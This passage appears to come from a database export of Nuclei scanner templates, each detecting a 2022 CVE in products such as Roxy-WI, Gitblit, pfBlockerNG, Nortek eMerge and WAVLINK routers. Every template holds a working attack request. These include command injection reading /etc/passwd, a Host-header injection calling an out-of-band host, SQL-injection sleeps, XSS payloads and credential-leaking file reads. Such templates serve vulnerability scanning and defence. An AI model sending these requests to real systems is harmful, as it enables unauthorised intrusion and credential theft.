\"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220193f90816efc79d2ac468c37e58a42add449c9c53f48ed07934c74f756d9550d022100bc87714095325fe51d81827336aa365718a61f67c95e590fea50198ba245e3eb:922c64590222798bb761d5b6d8e72950", "hash": "3d2511228743863d9096f1d6551b5470", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30851f" }, "name": "CVE-2022-31126.yaml", "content": "id: CVE-2022-31126\n\ninfo:\n name: Roxy-WI <6.1.1.0 - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n Roxy-WI before 6.1.1.0 is susceptible to remote code execution. 
System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Users are advised to upgrade to latest version.\n reference:\n - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html\n - https://www.cve.org/CVERecord?id=CVE-2022-31137\n - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31137\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31126\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31126\n cwe-id: CWE-74\n epss-score: 0.84229\n epss-percentile: 0.98401\n cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: roxy-wi\n product: roxy-wi\n shodan-query: http.html:\"Roxy-WI\"\n tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi\n\nhttp:\n - raw:\n - |\n POST /app/options.py HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/app/login.py\n\n alert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950", "hash": "769392c2ce97028638af3b11da8e938d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308520" }, "name": "CVE-2022-31268.yaml", "content": "id: CVE-2022-31268\n\ninfo:\n name: Gitblit 1.9.3 - Local 
File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Gitblit 1.9.3 is vulnerable to path traversal (local file inclusion) via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname), allowing unauthenticated read access to files inside the web application.\n impact: |\n Successful exploitation of this vulnerability allows an unauthenticated attacker to read sensitive files inside the web application, such as WEB-INF/web.xml and gitblit.properties, which may disclose configuration details and credentials. Consistent with the CVSS vector (C:H/I:N/A:N), the direct impact is confidentiality loss; it does not by itself provide code execution.\n remediation: |\n Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).\n reference:\n - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md\n - https://vuldb.com/?id.200500\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31268\n - https://github.com/Marcuccio/kevin\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31268\n cwe-id: CWE-22\n epss-score: 0.00618\n epss-percentile: 0.76574\n cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: gitblit\n product: gitblit\n shodan-query: http.html:\"Gitblit\"\n tags: cve,cve2022,lfi,gitblit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resources//../WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"</web-app>\"\n - \"java.sun.com\"\n - \"gitblit.properties\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e2e1fcaa58d2dee7545ceebd7a5676ce15a39fc9158480ee7246e0b44b801c19022100bd5e8b3b6dea5d148c40a77c6183f6e003c34e77f22ac9d017f7b00b202f9952:922c64590222798bb761d5b6d8e72950", "hash": "ece4bccd3d807f8ca41641d0bf800346", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308521" }, "name": "CVE-2022-31269.yaml", "content": "id: CVE-2022-31269\n\ninfo:\n name: Linear eMerge E3-Series - Information Disclosure\n 
author: For3stCo1d\n severity: high\n description: |\n Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html\n - https://www.nortekcontrol.com/access-control/\n - https://eg.linkedin.com/in/omar-1-hashem\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31269\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2022-31269\n cwe-id: CWE-798\n epss-score: 0.00231\n epss-percentile: 0.6049\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: http.title:\"Linear eMerge\"\n tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/test.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"ID=\"\n - \"Password=\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/plain\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - Password='(.+?)'\n# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950", "hash": "d07ae00e1db985e3766679719258943a", "level": 5, "time": "2024-05-17 23:39:45" }, { 
"_id": { "$oid": "66477a413521042ccf308522" }, "name": "CVE-2022-31299.yaml", "content": "id: CVE-2022-31299\n\ninfo:\n name: Haraj 3.7 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Haraj 3.7 contains a reflected cross-site scripting vulnerability in the User Upgrade Form (payform.php, 'note' parameter). An attacker can inject malicious script and thus steal authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/bigzooooz/CVE-2022-31299\n - https://angtech.org\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31299\n - https://angtech.org/product/view/3\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31299\n cwe-id: CWE-79\n epss-score: 0.00209\n epss-percentile: 0.58245\n cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: angtech\n product: haraj\n tags: cve,cve2022,haraj,xss,angtech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '><script>alert(document.domain)</script></textarea>'\n - 'content=\"nextHaraj'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950", "hash": "d613816fb60463b9e27de21a692dd037", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308523" }, "name": "CVE-2022-31373.yaml", "content": "id: CVE-2022-31373\n\ninfo:\n name: SolarView Compact 6.00 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/badboycxcc/SolarView_Compact_6.0_xss\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31373\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/badboycxcc/badboycxcc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31373\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve2022,cve,xss,solarview,contec\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: 
and\n matchers:\n - type: word\n part: body\n words:\n - '/Solar_AiConf.php/\"><script>alert(document.domain)</script>'\n - 'HREF=\"Solar_Service.php\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950", "hash": "bec76da3e718672f1938f7fbd0d35aed", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308524" }, "name": "CVE-2022-3142.yaml", "content": "id: CVE-2022-3142\n\ninfo:\n name: NEX-Forms Plugin < 7.9.7 - SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\n remediation: Fixed in version 7.9.7\n reference:\n - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/\n - https://www.exploit-db.com/exploits/51042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3142\n - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html\n - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3142\n cwe-id: CWE-89\n epss-score: 0.00356\n epss-percentile: 0.71515\n cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: basixonline\n product: nex-forms\n framework: wordpress\n publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/\n tags: 
cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 30s\n GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n - 'status_code_2 == 200'\n - 'contains(body_2, \"NEX-Forms\")'\n - 'contains(content_type_2, \"text/html\")'\n condition: and\n# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950", "hash": "11334464026274b5c2f93f7b6e798167", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308525" }, "name": "CVE-2022-31474.yaml", "content": "id: CVE-2022-31474\n\ninfo:\n name: BackupBuddy - Local File Inclusion\n author: aringo\n severity: high\n description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.\n remediation: Upgrade to at least version 8.7.5 or higher\n reference:\n - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/\n - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy\n - https://ithemes.com/backupbuddy/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474\n - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: 
CVE-2022-31474\n cwe-id: CWE-22\n epss-score: 0.0063\n epss-percentile: 0.78579\n cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ithemes\n product: backupbuddy\n framework: wordpress\n tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecf44787bd6300f50e4a767ffe601dd4051e6dadfe6cd36dcbb948a853a44dbf02205339443407fd4fb29ff75bd9f6565a7dc2d382e699cca5b76c135da1b219d1cc:922c64590222798bb761d5b6d8e72950", "hash": "2a2fa0c352e2029815c9602e19ca2f6a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308526" }, "name": "CVE-2022-31499.yaml", "content": "id: CVE-2022-31499\n\ninfo:\n name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection\n author: pikpikcu\n severity: critical\n description: |\n Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html\n - https://github.com/omarhashem123/CVE-2022-31499\n - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31499\n - https://eg.linkedin.com/in/omar-1-hashem\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31499\n cwe-id: CWE-78\n epss-score: 0.50608\n epss-percentile: 0.97247\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: title:\"eMerge\"\n tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration>=7\n - contains(header, \"text/html\")\n - status_code == 200\n - contains(body, '{\\\"CardNo\\\":false')\n condition: and\n# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950", "hash": "cb722992000cfad9c9287ccd20c0c135", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308527" }, "name": "CVE-2022-31656.yaml", "content": "id: CVE-2022-31656\n\ninfo:\n name: VMware - Local File Inclusion\n author: DhiyaneshDk\n severity: critical\n description: |\n VMware Workspace ONE Access, 
Identity Manager, and vRealize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n impact: |\n The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.\n reference:\n - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\n - https://www.vmware.com/security/advisories/VMSA-2022-0021.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31656\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31656\n cwe-id: CWE-287\n epss-score: 0.75034\n epss-percentile: 0.98069\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: vmware\n product: identity_manager\n shodan-query: http.favicon.hash:-1250474341\n tags: cve2022,cve,vmware,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<web-app\"\n - \"<servlet-name>\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950", "hash": "2d0a237e2fd94071484cc8b5502df85c", "level": 6, "time": 
"2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308528" }, "name": "CVE-2022-31798.yaml", "content": "id: CVE-2022-31798\n\ninfo:\n name: Nortek Linear eMerge E3-Series - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.\n reference:\n - https://packetstormsecurity.com/files/167992/\n - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31798\n - https://eg.linkedin.com/in/omar-1-hashem\n - https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31798\n cwe-id: CWE-384\n epss-score: 0.00126\n epss-percentile: 0.46259\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: http.title:\"eMerge\"\n tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ',\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: 
status\n status:\n - 200\n# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950", "hash": "ac8a4edae89c7f800f25a939845ad62b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308529" }, "name": "CVE-2022-31814.yaml", "content": "id: CVE-2022-31814\n\ninfo:\n name: pfSense pfBlockerNG <=2.1.4_26 - OS Command Injection\n author: EvergreenCartoons\n severity: critical\n description: |\n pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to a patched version of pfSense pfBlockerNG (>=2.1.4_27) to mitigate this vulnerability.\n reference:\n - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/\n - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html\n - https://github.com/EvergreenCartoons/SenselessViolence\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31814\n - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31814\n cwe-id: CWE-78\n epss-score: 0.96552\n epss-percentile: 0.9952\n cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: netgate\n product: pfblockerng\n framework: pfsense\n tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate\n\nhttp:\n - raw:\n - |+\n GET /pfblockerng/www/index.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n - |+\n GET /pfblockerng/www/index.php HTTP/1.1\n Host: ' *; host {{interactsh-url}}; '\n Accept: */*\n\n unsafe: true\n\n 
matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_1, \"GIF\")'\n\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950", "hash": "b4b14d2dab7a4e1139c758d07e11fdcf", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852a" }, "name": "CVE-2022-31845.yaml", "content": "id: CVE-2022-31845\n\ninfo:\n name: WAVLINK WN535 G3 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31845\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31845\n cwe-id: CWE-668\n epss-score: 0.00874\n epss-percentile: 0.80606\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET 
/live_check.shtml HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Model='\n - 'FW_Version='\n - 'LanIP='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950", "hash": "6986b876bbbc584aa997baebac923755", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852b" }, "name": "CVE-2022-31846.yaml", "content": "id: CVE-2022-31846\n\ninfo:\n name: WAVLINK WN535 G3 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31846\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31846\n cwe-id: CWE-668\n epss-score: 0.00874\n epss-percentile: 0.80651\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n 
shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/live_mfg.shtml\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Model='\n - 'DefaultIP='\n - 'LOGO1='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950", "hash": "9e3f7c713f29c6c6e6ce1193310cda41", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852c" }, "name": "CVE-2022-31847.yaml", "content": "id: CVE-2022-31847\n\ninfo:\n name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - 